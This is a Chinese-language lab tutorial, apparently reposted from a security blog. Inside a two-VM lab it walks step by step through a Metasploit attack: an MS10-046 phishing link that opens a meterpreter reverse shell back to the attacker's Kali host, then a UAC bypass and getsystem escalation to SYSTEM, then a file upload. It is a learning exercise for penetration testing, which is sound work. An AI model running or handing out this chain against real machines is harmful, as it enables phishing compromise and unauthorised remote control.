钓鱼网站+bypassuac提权
2022-11-19 08:52:43 Author: 黑白之道(查看原文) 阅读量:17 收藏

本实验实现1:要生成一个钓鱼网址链接,诱导用户点击,实验过程是让win7去点击这个钓鱼网站链接,则会自动打开一个文件共享服务器的文件夹,在这个文件夹里面会有两个文件,当用户分别点击执行后,则会主动连接到发起攻击的主机上,即可攻击成功

本实验实现2:攻击成功后,想要从kali上传文件到win7中,后发现权限不够的问题,则进行提权操作,后成功上传文件

在VMware上建立两个虚拟机:win7和kali

Kali:它是Linux发行版的操作系统,它拥有超过300个渗透测试工具,就不用自己再去找安装包,去安装到我们自己的电脑上了,毕竟自己从网上找到,也不安全。它甚至还集成了600多种黑客工具,很强大。

可以永久免费使用,基本上学黑客攻击必会用到这个系统

靶机:Win7 64位 (IP: 192.168.10.36)--用ipconfig进行查询

攻击机:Kali 64位 (IP:192.168.10.21)--用ifconfig进行查询

1、实验环境前提条件:

win7中,关闭防火墙(“打开网络和共享中心”-“Windows防火墙”-“打开或关闭Windows防火墙”-均选择关闭选项)

保证两个虚拟机是可以ping通的(尤其是在kali中去ping win7,看能否连通)

>ping 192.168.10.36

2、打开Metasploit渗透工具

Metasploit是一款开源的安全漏洞检测工具,msfconsole用于启动msf终端

>msfconsole

结果:成功进入,进入到"msf6>“的模式下

3、查看需要利用的漏洞

搜索漏洞,编号为ms10-046

补充:Windows系统漏洞微软的漏洞编号命名格式为:MS10-046;

MS Micosoft的缩写,固定格式;
10 表示年份,即2010年发布的漏洞;
046 表示顺序,即当年度发布的第46个漏洞。

>search ms10-046

结果:可以看到返回了多条可利用的漏洞模块信息

4、尝试利用其中一个漏洞模块进行攻击

利用其中一个漏洞攻击模块-0模块,进行攻击,进入模块中(注意:必须是“_”,不是“-”,否则会报错)

>use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

结果:成功切换到这个模块之下--”msf6 exploit(windows/browser/ms10_046_shortcut_icon_dllloader)>“

并提示“no payload configured,defaulting to windows/meterpreter/reverse_tcp”--没有配置payload,默认为 windows/meterpreter/reverse_tcp

5、查看该漏洞模块所需的参数情况

进到这个漏洞模块之后,先查看该测试模块的参数情况。类似于你使用一软件,进行攻击,是不是需要先进行一些简单的参数配置啊,需要告诉软件,要向谁发起攻击吧,这是最最基本的,所以,要配置,就要先查看都可以配置哪些参数?

>show options

结果:其中required显示的值为yes的,代表是必须要设置的项;显示的值为no的,代表是不必须要设置的项;

重点关注5个参数配置,需要设置哪个就设置哪个:

Payload(攻击载体-使用默认的windows/meterpreter/reverse_tcp即可) ;

SRVHOST(文件共享服务器-kali地址);

SRVPORT(文件共享服务器的端口-使用默认获取的端口即可);

LHOST(发起攻击的地址-kali地址);

LPORT(发起攻击的端口-使用默认获取的端口即可)

补充说明:

1)Payload中包含有需要在远程系统中运行的恶意代码,Payload是一种特殊模块,它们能够以漏洞利用模块运行,并能够利用目标系统中的安全漏洞实施攻击。也就是说,漏洞利用模块可以访问目标系统,而其中的代码定义了Payload在目标系统中的行为。

2)Payload模块主要有以下三种类型:-Single    -Stager    -Stage

Single是一种完全独立的Payload,实现的目的也简单,但容易被捕捉到。

Stager这种Payload负责建立目标用户与攻击者之间的网络连接,并下载额外的组件或应用程序。   一种常见的Stagers Payload就是reverse_tcp,它可以让目标系统与攻击者建立一条tcp连接(3次握手-4次挥手)(是一个基于TCP的反向链接反弹shell, 使用起来很稳定)。

Stage是Stager Payload下载的一种Payload组件,这种Payload可以提供更加高级的功能,而且没有大小限制。

3)windows/x64/meterpreter/reverse_tcp则由一个Stager Payload(reverse_tcp)和一个Stage Payload(meterpreter)组成。

【注意:Payload为windows/meterpreter/reverse_tcp 默认获取到的控制通道meterpreter为32位,

如果想将之后获取到的控制通道meterpreter改为64位,则设置payload:windows/x64/meterpreter/reverse_tcp】

6、设置文件共享服务器

发现仅SRVHOST为空待设置,其它(payload/SRVPORT/LHOST/LPORT)均已获取,且正确,设置SRVHOST的对应的参数地址,它指的是文件共享服务器的地址,想一想,要设成谁?为什么?

分析一下:是在哪里用到这个文件共享服务器?是不是会在生成一个钓鱼网址,诱导用户点击了,就会自动给它打开一个文件共享服务器文件夹啊,我们在这用。那你们觉得应该是谁生成这个文件夹呢?是用户那边么?还是攻击者这边?肯定是攻击者这边吧,我们是不知道会有谁点了这个钓鱼网站链接吧

所以,我们才会对这个文件共享服务器的地址设置为kali的地址

>set SRVHOST 192.168.10.21

7、再次进行检查

>show options

8、检查无误后,发起攻击

>run

结果:生成一个钓鱼网站的链接“Using URL : http://192.168.10.21:80/“,开启服务,等待有人点击该钓鱼网站链接

9、打开钓鱼网站链接

到win7中,在IE浏览器中打开钓鱼网站链接:http://192.168.10.21:80/,会自动打开文件共享服务器文件夹,文件夹中会生成两个文件,尝试去双击打开“MISvnxTX”快捷方式的文件,即可触发会话连接

结果1:在win7中打开该快捷方式的文件后,不会有任何的反馈结果

结果2:由于在win7中触发打开了快捷方式的文件,那么,在kali中,则会被触发会话连接,结果显示了是192.168.10.36尝试点击了钓鱼网站链接,并利用ms10-046漏洞模块对目标主机发起了攻击,最终,“meterpreter session 1 opened”--表明已经开通192.168.10.21:4444和192.168.10.36:49195会话连接1

10、手动连接会话,进入控制通道

一旦开通一个会话连接后,若系统没有自动进入控制通道,则进行手动连接

10.1)手动查看当前存在的会话

注意在目录msf>下,手动查看当前存在的会话

结果:当前只有会话连接1,meterpreter建立的连接类型type是x84--32位的(由模块中的payload设定),以及展示目标主机192.168.10.36的基本信息和连接信息

>sessions

10.2)选择连接当前已经开通的会话1,并进入控制通道meterpreter,交互模式,表明攻击成功

>sessions -i 1

11、实现上传文件

在控制通道中,从kali主机中上传一个文件到win7中C盘根目录下(前提:在kali的主文件夹中新建1.txt,目录则是/home/kali/1.txt),使用的命令是upload

11.1)正常使用上传文件的命令upload

meterpreter>upload  /home/kali/1.txt  c:\

如果不能立马发聩结果的话,一般要手动回车两次,即可得到结果,但反馈结果提示错误信息:

“operation failed:access is denied”----操作失败: 访问被拒绝

11.2)分析错误的原因

1)先考虑是不是命令书写不对的啊,如果故意将命令书写不对,应该得到的提示是:“运行命令上传错误: 没有这样的文件或目录@rb _ file _ s _ stat-/home/kal/1. txror”

meterpreter>upload  /home/ka/1.txt  c:\ 

结果:“NO such file or directory.....”--没有这样的文件或目录,明显和“访问被拒绝”不一样,所以可以得到,上述错误不是书写不对的问题。

2)那这就要考虑,访问被拒绝,是不是权限上的问题,一般来说,权限够的话,命令是不应该被拒绝,所以要考虑提权的问题。

补充

windows系统中用户权限

user【普通用户-张三】;

administrator【管理员用户】;

system【系统用户、虽不可登录,最高权限,但对系统有完整的控制权】;

Linux系统中用户权限

user【普通用户】;

root【超级用户】;

11.3)提权

用于提权,有个常用的命令:getsystem命令

meterpreter>getsystem

结果:提示提权失败,“priv_elevate_getsystem: operation failed:this function is not supported on this system. the following was attempted:” ----操作失败: 该系统不支持此函数

11.4)为什么会提权失败呢?

首先我们要知道Windows vista系统(2005年微软开发的一款个人桌面操作系统,07年正式出售使用,12年终止它的主流技术支持,17年终止其的一切支持),是微软比较早的一个系统版本。它是在windowsXP和win7之间的一个过渡性系统,明显win7是晚于vista系统开发的

在晚于vista以后的系统中,增加了一个UAC的功能(user access control-用户账户控制),这个功能会对管理员组的用户起到一定的限制作用,目的是为了保护计算机的安全。也就是说,当我们需要运行一些重要的程序时,比如只有管理员权限才能运行的程序时,UAC功能就会弹出一个对话框,对用户进行询问,只有用户点击了同意按钮,程序才会以管理员或者system权限去运行。

因此,我们要想提权成功,首先要绕过windows的UAC限制,然后使用getsystem命令进行提权即可,接下来我们可以使用常用的绕过UAC的套路-bypassuac模块,进行绕过UAC限制

12、使用bypassuac模块绕过UAC限制

12.1)查看当前权限

以上都是我们的分析,认为是权限的问题,那我们就来验证一下吧,看当前的权限到底是不是普通的权限啊,不是最高权限-system。进行当前权限的查看。

而且,即便没有以上这些问题的话,我们也要认清一个事实,就是:在获得了session后,说明建立了至少一个会话了,我们可以通过连接会话,来获取控制通道meterpreter,但注意,这并不意味着我们就可以为所欲为了,必然是会有一个权限的问题,一般不会一上来就能获得最高的权限,所以,会有两种情况:获得system最高权限,或者是普通用户权限

meterpreter>getuid

结果:查看当前获得的用户的权限,只是普通用户权限”18044“,不是最高权限system

12.2)挂起当前会话

由于bypassuac模块是利用已有的会话连接,绕过UAC限制,最终会获得一个新的会话连接,所以它的前提是要成功开启一个会话连接,并保留下来,且不可以断开连接(exit),以供使用,所以,可以利用background进行返回,将攻击成功以后给我们返回的控制通道meterpreter 后台挂起,将当前的session会话1放入后台

meterpreter>background

结果:成功将session会话1挂起到后台,并没有断开连接,且成功切换到msf >目录下

12.3)使用bypassuac模块绕过UAC限制,查看需要利用的漏洞    

>search bypassuac

结果:可以看到返回了多条可利用的漏洞模块信息

12.4)尝试利用其中一个漏洞模块进行攻击

利用其中一个漏洞攻击模块-02模块,进行攻击,进入模块中(注意:必须是“_”,不是“-”,否则会报错)

>use exploit/windows/local/bypassuac

结果:成功切换到这个模块之下--”msf6 exploit(windows/local/bypassuac)>“

并提示“no payload configured,defaulting to windows/meterpreter/reverse_tcp”--没有配置payload,默认为 windows/meterpreter/reverse_tcp

12.5)查看该漏洞模块的参数情况

进到这个漏洞模块之后,先查看该测试模块的参数情况

>show options

结果展示:其中required显示的值为yes的,代表是必须要设置的项;显示的值为no的,代表是不必须要设置的项;

重点关注4个参数配置,需要设置哪个就设置哪个:

Payload(攻击载体-使用默认的windows/meterpreter/reverse_tcp即可) ;

SESSION(已开启的会话连接);

LHOST(发起攻击的地址-kali地址);

LPORT(发起攻击的端口-使用默认获取的端口即可)

12.6)设置目标主机地址

其它(payload/LHOST/LPORT)均已获取,且正确。

发现仅SESSION为空待设置,需要设置,提示“the session to run this module on”-“运行此模块的会话”,我们肯定要设置一个已有的会话号吧,若是没有的会话,设置它也没法用,所以,参数SESSION指的是已开启的会话连接,应设置成我们已有的session连接会话1,被我们挂起放在后台了

>set SESSION 1

12.7)再次进行检查

>show options

12.8)检查无误后,发起攻击

>run

结果显示:利用bypassuac漏洞模块对目标主机发起了攻击,成功绕过UAC限制,“meterpreter session 2 opened”--表明已经开通了192.168.10.21:4444和192.168.10.36:49199的新会话连接2

13、手动连接会话,进入控制通道

一旦开通一个新的会话连接后,系统没有自动返回控制通道,进行手动连接

13.1)手动查看当前存在的会话

注意在目录msf>下,结果显示:会话连接1和新生成的会话连接2,meterpreter建立的连接类型type是x84--32位的(由模块中的payload设定),以及展示目标主机192.168.10.36的基本信息和连接信息

>sessions

13.2)选择连接当前已经开通的新会话2,并进入控制通道meterpreter,交互模式,表明攻击成功

注意:就不要再连接会话1了,我们之前已经试过连接1,到控制通道,发现因权限不够,而提权失败。所以,要选择连接会话2,这是我们利用bypassuac模块绕过UAC功能,开启的新的会话连接,肯定要进到该会话中,才能实现成功提权的目的】

>sessions -i 2

14、查看当前权限,并进行提权

14.1)进入控制通道后,先查看当前获得的用户的权限

meterpreter>getuid

结果:发现还只是普通用户权限,不是最高权限system

14.2)再次提权

理论上,我们是通过bypassuac模块获取的该权限,应已绕过了UAC限制,可以成功进行提权操作。用常用的提权命令:getsystem命令

meterpreter>getsystem

结果:“got system” ---提示提权成功

14.3)再次查看当前获得的权限

meterpreter>getuid

结果:获取了最高权限system

15、再次上传文件

提权成功后,就可以用upload进行文件的上传,从kali传送到win7的C盘下

meterpreter>upload  /home/kali/1.txt  c:\

结果1:成功将kali中的1.txt上传到win7的C盘根目录下

结果2:在win7中c盘根目录下发现传过来的1.txt文档

作者:柚子小白666, 转自FreeBuf.COM

黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!

如侵权请私聊我们删文

END

多一个点在看多一条小鱼干


文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650556598&idx=4&sn=abf80298777de50c0108b0c0b93a9eef&chksm=83bd2d52b4caa44401ed27f78a44b5f5e29ba7a0a727ca088d2a3e08987263a9744b313b136a#rd
如有侵权请联系:admin#unsafe.sh